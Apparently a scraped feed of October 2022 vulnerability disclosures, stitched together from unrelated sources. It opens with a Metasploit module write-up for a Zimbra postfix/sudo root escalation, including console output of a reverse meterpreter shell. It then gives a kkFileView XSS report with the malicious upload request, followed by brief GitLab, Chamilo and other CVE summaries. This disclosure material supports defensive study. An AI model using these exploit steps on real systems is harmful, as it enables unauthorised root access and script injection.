Due to an issue with incorrect sudo permissions, Zimbra Collaboration Suite (ZCS) suffers from a local privilege escalation issue in versions 9.0.0 and prior, where the 'zimbra' user can effectively coerce postfix into running arbitrary commands as 'root'.

**Verification**

List the steps needed to make sure this thing works

*   Start msfconsole
*   Get a session as the zimbra user somehow (I used exploit/linux/http/zimbra_cpio_cve_2022_41352, which isn't merged yet, but any way to get a shell is fine)
*   use exploit/linux/local/zimbra_postfix_priv_esc
*   set SESSION <session>
*   exploit
*   Should give you root!

    msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -l
    
    Active sessions
    ===============
    
      Id  Name  Type                   Information                Connection
      --  ----  ----                   -----------                ----------
      1         meterpreter x64/linux  zimbra @ mail.example.org  172.16.166.147:4444 -> 172.16.166.157:47210 (172.16.166.157)
    
    msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > use exploit/linux/local/zimbra_postfix_priv_esc
    [*] Using configured payload linux/x64/meterpreter/reverse_tcp
    msf6 exploit(linux/local/zimbra_postfix_priv_esc) > set SESSION 1
    SESSION => 1
    msf6 exploit(linux/local/zimbra_postfix_priv_esc) > exploit
    
    [*] Started reverse TCP handler on 172.16.166.147:4444 
    [*] Running automatic check ("set AutoCheck false" to disable)
    [*] Sending stage (3045348 bytes) to 172.16.166.157
    [*] Executing: sudo -n -l
    [+] The target appears to be vulnerable.
    [*] Creating exploit directory: /tmp/.GPjXSraCDY
    [*] Writing '/tmp/.GPjXSraCDY/.qjSY8' (250 bytes) ...
    [*] Attempting to trigger payload: sudo /opt/zimbra/common/sbin/postfix -D -v /tmp/.GPjXSraCDY/.qjSY8
    [*] Sending stage (3045348 bytes) to 172.16.166.157
    [+] Deleted /tmp/.GPjXSraCDY
    [*] Meterpreter session 5 opened (172.16.166.147:4444 -> 172.16.166.157:36488) at 2022-10-14 13:19:25 -0700
    
    meterpreter > getuid
    Server username: root
    

**Instructions for installing Zimbra**

(Adapted from @cdelafuente-r7's original install way back like two months ago)

Create a VM

    HDD = 128gb
    Memory/etc don't matter
    

I installed a local DNS server (note: replace <ip> with the host's actual ip) (other note: replace apt with yum to do this on a Red Hat-derived system):

    sudo apt update && sudo apt install dnsmasq
    sudo hostnamectl set-hostname mail.example.org
    echo "<ip> mail.example.org" | sudo tee -a /etc/hosts
    echo -e 'listen-address=127.0.0.1\nserver=8.8.8.8\ndomain=example.org\nmx-host=example.org, mail.example.org, 5\nmx-host=mail.example.org, mail.example.org, 5' | sudo tee /etc/dnsmasq.conf
    

Configure the host to use it:

    sudo systemctl disable systemd-resolved
    sudo systemctl stop systemd-resolved
    sudo killall dnsmasq
    sudo systemctl restart dnsmasq
    echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
    

Download Zimbra from https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you'll have to sell your soul and opt-in to spam, but they don't validate your email.

    tar -xvvzf zcs-*.tgz
    cd zcs*
    sudo ./install.sh
    
    * Lots of <enter>
    * DO NOT install `dnscache` module (respond `N` when it ask), I had conflict issues with the local `dnsmasq`
    * Yes change the system
    * Setup the admin password, probably turn off auto-updates

CVE-2022-3569: Check in zimbra_postfix_priv_esc.rb by rbowes-r7 · Pull Request #17141 · rapid7/metasploit-framework

kkFileView 4.0 is vulnerable to Cross Site Scripting (XSS) via controller\ Filecontroller.java.

Permalink

**KkFileView has XSS vulnerability**

After visiting the Web page, KKfileview project first selects the browse button to add relevant files, and then clicks the upload button. The added file is a JSP file containing malicious JS statements. The contents of the file are as follows:

<html\>
<title\>test ip</title\>
<body\>
<script\>
alert('x')
</script\>
</body\>
</html\>

The request packet is as follows

    POST /fileUpload HTTP/1.1
    Host: 192.168.17.168:8012
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------199653466720897274883663154374
    Content-Length: 322
    Origin: http://192.168.17.168:8012
    DNT: 1
    Connection: close
    Referer: http://192.168.17.168:8012/index
    
    -----------------------------199653466720897274883663154374
    Content-Disposition: form-data; name="file"; filename="x.jsp"
    Content-Type: application/octet-stream
    
    <html>
    <title>test ip</title>
    <body>
    <script>
    alert('x')
    </script>
    </body>
    </html>
    
    -----------------------------199653466720897274883663154374--
    

Then view the address of the uploaded file under the file name address demo/x.jsp

The file can be accessed directly by concatenating the URL, and the malicious JS file can be executed

View the server\ src \main\ Java \cn\keking\web\controller\ Filecontroller.java

The reasons for this vulnerability are as follows:

1.  The fileUpload method determines only the file name but not the contents of the file
2.  The file upload path is not authenticated

CVE-2022-42147: paper/xss_vul_en.md at main · xiaojiangxl/paper

Chamilo 1.11.16 is affected by an authenticated local file inclusion vulnerability which allows authenticated users with access to 'big file uploads' to copy/move files from anywhere in the file system into the web directory.

CVE-2022-42029: Security issues - Chamilo LMS

A cross-site scripting issue has been discovered in GitLab CE/EE affecting all versions before 15.1.6, 15.2 to 15.2.4 and 15.3 prior to 15.3.2. It was possible to exploit a vulnerability in setting the labels colour feature which could lead to a stored XSS that allowed attackers to perform arbitrary actions on behalf of victims at client side.

🤖 GitLab Bot 🤖 authored Oct 17, 2022

CVE-2022-2865: 2022/CVE-2022-2865.json · master · GitLab.org / cves · GitLab

An issue in Incident Timelines has been discovered in GitLab CE/EE affecting all versions starting from 14.9 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2.which allowed an authenticated attacker to inject arbitrary content. A victim interacting with this content could lead to arbitrary requests.

CVE-2022-2527: 2022/CVE-2022-2527.json · master · GitLab.org / cves · GitLab

A potential DoS vulnerability was discovered in Gitlab CE/EE versions starting from 10.7 before 15.1.5, all versions starting from 15.2 before 15.2.3, all versions starting from 15.3 before 15.3.1 allowed an attacker to trigger high CPU usage via a special crafted input added in the Commit message field.

CVE-2022-2908: 2022/CVE-2022-2908.json · master · GitLab.org / cves · GitLab

A crafted tag in the Jupyter Notebook viewer in GitLab EE/CE affecting all versions before 15.1.6, 15.2 to 15.2.4, and 15.3 to 15.3.2 allows an attacker to issue arbitrary HTTP requests

CVE-2022-2428: 2022/CVE-2022-2428.json · master · GitLab.org / cves · GitLab

A branch/tag name confusion in GitLab CE/EE affecting all versions prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1 allows an attacker to manipulate pages where the content of the default branch would be expected.

CVE-2022-3288: 2022/CVE-2022-3288.json · master · GitLab.org / cves · GitLab

Lack of IP address checking in GitLab EE affecting all versions from 14.2 prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1 allows a group member to bypass IP restrictions when using a deploy token

CVE-2022-3286: 2022/CVE-2022-3286.json · master · GitLab.org / cves · GitLab

An issue has been discovered in hunter2 affecting all versions before 2.1.0. Improper handling of auto-completion input allows an authenticated attacker to extract other users email addresses

Tag

#js